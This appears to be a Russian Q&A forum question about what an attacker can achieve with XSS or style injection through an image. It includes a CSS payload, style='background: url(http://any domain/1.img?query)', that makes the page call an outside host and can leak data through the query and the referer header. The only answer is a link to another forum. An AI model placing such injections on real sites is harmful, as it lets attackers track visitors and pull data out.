Задать вопрос
@top13
защита-от-взлома

XSS: можно ли подгрузить картинкой что-то опасное?

Что можно сделать, если получилось встроить?

style="background: url(http://любой домен/1.img)"

Еще можно передавать запросы style="background: url(http://любой домен/1.img?запрос)"

Рефлер сам сайт, при запросе, передает информацию вместе с заголовками.
  • Вопрос задан
  • 3192 просмотра
Комментировать
Подписаться 3 Оценить Комментировать
Помогут разобраться в теме Все курсы
  • АПОК
    Техническая защита информации - курс переподготовки
    1 месяц
    Далее
  • Учебный центр IBS
    SECR-011 Обеспечение безопасности значимых объектов критической информационной инфраструктуры
    1 неделя
    Далее
  • ITCOM Academy
    Техническая защита информации. Организация защиты информации ограниченного доступа, не содержащей сведения, составляющие государственную тайну
    5 недель
    Далее
Пригласить эксперта
Ответы на вопрос 1
@DaNHell
Change the world
Полнее некуда
forum.antichat.ru/thread20140.html
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Главный менеджер управления поддержки продаж сети
ПСБ цифровая лаборатория Москва
от 110 000 до 130 000 ₽
Аналитик-разработчик (команда Intelligent Search)
Сбер Москва
от 250 000 до 400 000 ₽
Java разработчик
SENSE
До 450 000 ₽
Ещё вакансии